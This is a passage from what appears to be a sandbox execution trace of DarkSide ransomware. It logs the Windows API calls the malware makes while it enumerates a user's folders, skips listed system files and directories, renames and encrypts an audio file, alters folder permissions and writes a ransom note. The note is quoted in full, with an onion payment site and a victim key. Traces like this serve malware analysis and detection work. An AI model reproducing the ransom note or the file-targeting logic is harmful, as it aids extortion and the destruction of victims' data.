Flags=0x0, Size=0x80104) returned 0x2690020 [0159.551] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x599a420b [0159.551] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73e93534 [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59ae6ac2 [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x353aec0a [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x380b01d3 [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x448b2f84 [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c964824 [0159.552] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27606d82 [0159.555] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x544727bf [0159.555] RtlComputeCrc32 (PartialCrc=0x27bf, Buffer=0x2690094, Length=0x80) returned 0xab2b0b73 [0159.555] RtlComputeCrc32 (PartialCrc=0xb73, Buffer=0x2690094, Length=0x80) returned 0x93d612f5 [0159.555] RtlComputeCrc32 (PartialCrc=0x12f5, Buffer=0x2690094, Length=0x80) returned 0x925246a8 [0159.555] RtlComputeCrc32 (PartialCrc=0x46a8, Buffer=0x2690094, Length=0x80) returned 0x5d89b3da [0159.555] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.555] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.556] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.557] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.557] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0159.557] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0159.557] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0159.557] wcslen (_String="autorun.inf") returned 0xb [0159.557] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0159.557] wcslen (_String="boot.ini") returned 0x8 [0159.557] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0159.557] wcslen (_String="bootfont.bin") returned 0xc [0159.557] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0159.557] wcslen (_String="bootsect.bak") returned 0xc [0159.557] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0159.557] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83f2f480, ftCreationTime.dwHighDateTime=0x1d5db4d, ftLastAccessTime.dwLowDateTime=0xaf392fe0, ftLastAccessTime.dwHighDateTime=0x1d5e52c, ftLastWriteTime.dwLowDateTime=0xaf392fe0, ftLastWriteTime.dwHighDateTime=0x1d5e52c, nFileSizeHigh=0x0, nFileSizeLow=0x15002, dwReserved0=0x0, dwReserved1=0x0, cFileName="efQ2i0D5 d__8X-vLSo.m4a", cAlternateFileName="EFQ2I0~1.M4A")) returned 1 [0159.557] _wcsicmp (_Str1="efQ2i0D5 d__8X-vLSo.m4a", _Str2="README.c06622a1.TXT") returned -13 [0159.557] wcsstr (_Str="efQ2i0D5 d__8X-vLSo.m4a", _SubStr="README") returned 0x0 [0159.557] _wcsicmp (_Str1="autorun.inf", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned -4 [0159.557] wcslen (_String="autorun.inf") returned 0xb [0159.557] _wcsicmp (_Str1="boot.ini", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned -3 [0159.557] wcslen (_String="boot.ini") returned 0x8 [0159.557] _wcsicmp (_Str1="bootfont.bin", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned -3 [0159.557] wcslen (_String="bootfont.bin") returned 0xc [0159.558] _wcsicmp (_Str1="bootsect.bak", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned -3 [0159.558] wcslen (_String="bootsect.bak") returned 0xc [0159.558] _wcsicmp (_Str1="desktop.ini", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned -1 [0159.558] wcslen (_String="desktop.ini") returned 0xb [0159.558] _wcsicmp (_Str1="iconcache.db", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 4 [0159.558] wcslen (_String="iconcache.db") returned 0xc [0159.558] _wcsicmp (_Str1="ntldr", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 9 [0159.558] wcslen (_String="ntldr") returned 0x5 [0159.558] _wcsicmp (_Str1="ntuser.dat", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 9 [0159.558] wcslen (_String="ntuser.dat") returned 0xa [0159.558] _wcsicmp (_Str1="ntuser.dat.log", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 9 [0159.558] wcslen (_String="ntuser.dat.log") returned 0xe [0159.558] _wcsicmp (_Str1="ntuser.ini", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 9 [0159.558] wcslen (_String="ntuser.ini") returned 0xa [0159.558] _wcsicmp (_Str1="thumbs.db", _Str2="efQ2i0D5 d__8X-vLSo.m4a") returned 15 [0159.558] wcslen (_String="thumbs.db") returned 0x9 [0159.558] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.558] wcslen (_String="386") returned 0x3 [0159.558] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.558] wcslen (_String="adv") returned 0x3 [0159.558] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.558] wcslen (_String="ani") returned 0x3 [0159.558] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.558] wcslen (_String="bat") returned 0x3 [0159.558] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.558] wcslen (_String="bin") returned 0x3 [0159.558] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.558] wcslen (_String="cab") returned 0x3 [0159.558] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.558] wcslen (_String="cmd") returned 0x3 [0159.558] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.558] wcslen (_String="com") returned 0x3 [0159.558] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.558] wcslen (_String="cpl") returned 0x3 [0159.558] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.558] wcslen (_String="cur") returned 0x3 [0159.559] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.559] wcslen (_String="deskthemepack") returned 0xd [0159.559] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.559] wcslen (_String="diagcab") returned 0x7 [0159.559] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.559] wcslen (_String="diagcfg") returned 0x7 [0159.559] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.559] wcslen (_String="diagpkg") returned 0x7 [0159.559] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.559] wcslen (_String="dll") returned 0x3 [0159.559] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.559] wcslen (_String="drv") returned 0x3 [0159.559] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.559] wcslen (_String="exe") returned 0x3 [0159.559] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.559] wcslen (_String="hlp") returned 0x3 [0159.559] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.559] wcslen (_String="icl") returned 0x3 [0159.559] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.559] wcslen (_String="icns") returned 0x4 [0159.559] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.559] wcslen (_String="ico") returned 0x3 [0159.559] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.559] wcslen (_String="ics") returned 0x3 [0159.559] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.559] wcslen (_String="idx") returned 0x3 [0159.559] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.559] wcslen (_String="ldf") returned 0x3 [0159.559] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.559] wcslen (_String="lnk") returned 0x3 [0159.559] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.559] wcslen (_String="mod") returned 0x3 [0159.559] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.559] wcslen (_String="mpa") returned 0x3 [0159.559] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.559] wcslen (_String="msc") returned 0x3 [0159.560] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.560] wcslen (_String="msp") returned 0x3 [0159.560] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.560] wcslen (_String="msstyles") returned 0x8 [0159.560] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.560] wcslen (_String="msu") returned 0x3 [0159.560] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.560] wcslen (_String="nls") returned 0x3 [0159.560] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.560] wcslen (_String="nomedia") returned 0x7 [0159.560] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.560] wcslen (_String="ocx") returned 0x3 [0159.560] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.560] wcslen (_String="prf") returned 0x3 [0159.560] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.560] wcslen (_String="ps1") returned 0x3 [0159.560] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.560] wcslen (_String="rom") returned 0x3 [0159.560] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.560] wcslen (_String="rtp") returned 0x3 [0159.560] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.560] wcslen (_String="scr") returned 0x3 [0159.560] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.560] wcslen (_String="shs") returned 0x3 [0159.560] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.560] wcslen (_String="spl") returned 0x3 [0159.560] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.560] wcslen (_String="sys") returned 0x3 [0159.560] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.560] wcslen (_String="theme") returned 0x5 [0159.560] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.560] wcslen (_String="themepack") returned 0x9 [0159.560] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.560] wcslen (_String="wpx") returned 0x3 [0159.560] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.560] wcslen (_String="lock") returned 0x4 [0159.560] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.561] wcslen (_String="key") returned 0x3 [0159.561] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.561] wcslen (_String="hta") returned 0x3 [0159.561] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.561] wcslen (_String="msi") returned 0x3 [0159.561] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.561] wcslen (_String="pdb") returned 0x3 [0159.561] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.561] wcslen (_String="sqlite") returned 0x6 [0159.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.561] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.561] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.561] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0159.561] wcscpy (in: _Dest=0x3210098, _Source="efQ2i0D5 d__8X-vLSo.m4a" | out: _Dest="efQ2i0D5 d__8X-vLSo.m4a") returned="efQ2i0D5 d__8X-vLSo.m4a" [0159.561] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a", dwFileAttributes=0x80) returned 1 [0159.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\efq2i0d5 d__8x-vlso.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0159.561] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.562] ReadFile (in: hFile=0x1d0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0159.562] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x6722f84 [0159.562] RtlComputeCrc32 (PartialCrc=0x2f84, Buffer=0x32ec24, Length=0x80) returned 0xe6ca29b [0159.562] RtlComputeCrc32 (PartialCrc=0xa29b, Buffer=0x32ec24, Length=0x80) returned 0xbbf1c02a [0159.562] RtlComputeCrc32 (PartialCrc=0xc02a, Buffer=0x32ec24, Length=0x80) returned 0xafadc08f [0159.562] RtlComputeCrc32 (PartialCrc=0xc08f, Buffer=0x32ec24, Length=0x80) returned 0x32d3dc84 [0159.562] CloseHandle (hObject=0x1d0) returned 1 [0159.563] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.563] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a" [0159.563] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a") returned 0x3f [0159.563] wcscpy (in: _Dest=0x32200ce, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.563] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\efq2i0d5 d__8x-vlso.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\efq2i0d5 d__8x-vlso.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\efQ2i0D5 d__8X-vLSo.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\efq2i0d5 d__8x-vlso.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0159.565] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.565] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5631da1b [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a742f57 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x707ea9d1 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb6f8bc3 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43cda380 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d32814a [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46a2f749 [0159.572] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a215bdc [0159.575] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x9b8c1b0a [0159.575] RtlComputeCrc32 (PartialCrc=0x1b0a, Buffer=0x2b70094, Length=0x80) returned 0xb3e2b9de [0159.575] RtlComputeCrc32 (PartialCrc=0xb9de, Buffer=0x2b70094, Length=0x80) returned 0x2a9db8de [0159.575] RtlComputeCrc32 (PartialCrc=0xb8de, Buffer=0x2b70094, Length=0x80) returned 0xd4d33025 [0159.575] RtlComputeCrc32 (PartialCrc=0x3025, Buffer=0x2b70094, Length=0x80) returned 0xf989360c [0159.575] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.575] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.576] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.577] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab10460, ftCreationTime.dwHighDateTime=0x1d5db96, ftLastAccessTime.dwLowDateTime=0x4bd15950, ftLastAccessTime.dwHighDateTime=0x1d5e42d, ftLastWriteTime.dwLowDateTime=0x4bd15950, ftLastWriteTime.dwHighDateTime=0x1d5e42d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fZIk7sRS9B", cAlternateFileName="FZIK7S~1")) returned 1 [0159.577] _wcsicmp (_Str1="$recycle.bin", _Str2="fZIk7sRS9B") returned -66 [0159.577] wcslen (_String="$recycle.bin") returned 0xc [0159.577] _wcsicmp (_Str1="config.msi", _Str2="fZIk7sRS9B") returned -3 [0159.577] wcslen (_String="config.msi") returned 0xa [0159.577] _wcsicmp (_Str1="$windows.~bt", _Str2="fZIk7sRS9B") returned -66 [0159.577] wcslen (_String="$windows.~bt") returned 0xc [0159.577] _wcsicmp (_Str1="$windows.~ws", _Str2="fZIk7sRS9B") returned -66 [0159.577] wcslen (_String="$windows.~ws") returned 0xc [0159.577] _wcsicmp (_Str1="windows", _Str2="fZIk7sRS9B") returned 17 [0159.577] wcslen (_String="windows") returned 0x7 [0159.577] _wcsicmp (_Str1="appdata", _Str2="fZIk7sRS9B") returned -5 [0159.577] wcslen (_String="appdata") returned 0x7 [0159.577] _wcsicmp (_Str1="application data", _Str2="fZIk7sRS9B") returned -5 [0159.578] wcslen (_String="application data") returned 0x10 [0159.578] _wcsicmp (_Str1="boot", _Str2="fZIk7sRS9B") returned -4 [0159.578] wcslen (_String="boot") returned 0x4 [0159.578] _wcsicmp (_Str1="google", _Str2="fZIk7sRS9B") returned 1 [0159.578] wcslen (_String="google") returned 0x6 [0159.578] _wcsicmp (_Str1="mozilla", _Str2="fZIk7sRS9B") returned 7 [0159.578] wcslen (_String="mozilla") returned 0x7 [0159.578] _wcsicmp (_Str1="program files", _Str2="fZIk7sRS9B") returned 10 [0159.578] wcslen (_String="program files") returned 0xd [0159.578] _wcsicmp (_Str1="program files (x86)", _Str2="fZIk7sRS9B") returned 10 [0159.578] wcslen (_String="program files (x86)") returned 0x13 [0159.578] _wcsicmp (_Str1="programdata", _Str2="fZIk7sRS9B") returned 10 [0159.578] wcslen (_String="programdata") returned 0xb [0159.578] _wcsicmp (_Str1="system volume information", _Str2="fZIk7sRS9B") returned 13 [0159.578] wcslen (_String="system volume information") returned 0x19 [0159.578] _wcsicmp (_Str1="tor browser", _Str2="fZIk7sRS9B") returned 14 [0159.578] wcslen (_String="tor browser") returned 0xb [0159.578] _wcsicmp (_Str1="windows.old", _Str2="fZIk7sRS9B") returned 17 [0159.578] wcslen (_String="windows.old") returned 0xb [0159.578] _wcsicmp (_Str1="intel", _Str2="fZIk7sRS9B") returned 3 [0159.578] wcslen (_String="intel") returned 0x5 [0159.578] _wcsicmp (_Str1="msocache", _Str2="fZIk7sRS9B") returned 7 [0159.578] wcslen (_String="msocache") returned 0x8 [0159.578] _wcsicmp (_Str1="perflogs", _Str2="fZIk7sRS9B") returned 10 [0159.578] wcslen (_String="perflogs") returned 0x8 [0159.578] _wcsicmp (_Str1="x64dbg", _Str2="fZIk7sRS9B") returned 18 [0159.578] wcslen (_String="x64dbg") returned 0x6 [0159.578] _wcsicmp (_Str1="public", _Str2="fZIk7sRS9B") returned 10 [0159.578] wcslen (_String="public") returned 0x6 [0159.578] _wcsicmp (_Str1="all users", _Str2="fZIk7sRS9B") returned -5 [0159.578] wcslen (_String="all users") returned 0x9 [0159.578] _wcsicmp (_Str1="default", _Str2="fZIk7sRS9B") returned -2 [0159.578] wcslen (_String="default") returned 0x7 [0159.578] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0159.578] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0159.578] wcscpy (in: _Dest=0x208e70, _Source="fZIk7sRS9B" | out: _Dest="fZIk7sRS9B") returned="fZIk7sRS9B" [0159.578] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.579] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.580] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" [0159.580] GetNamedSecurityInfoW () returned 0x0 [0159.580] SetEntriesInAclW () returned 0x0 [0159.580] SetNamedSecurityInfoW () returned 0x0 [0159.583] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b7a8) returned 1 [0159.583] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.583] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b")) returned 1 [0159.583] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.583] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0159.613] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0159.614] CloseHandle (hObject=0x1c) returned 1 [0159.614] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b")) returned 0x10 [0159.615] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\") returned="" [0159.615] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\") returned 0x33 [0159.615] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0159.615] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab10460, ftCreationTime.dwHighDateTime=0x1d5db96, ftLastAccessTime.dwLowDateTime=0x8cd717e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cd717e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.615] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, 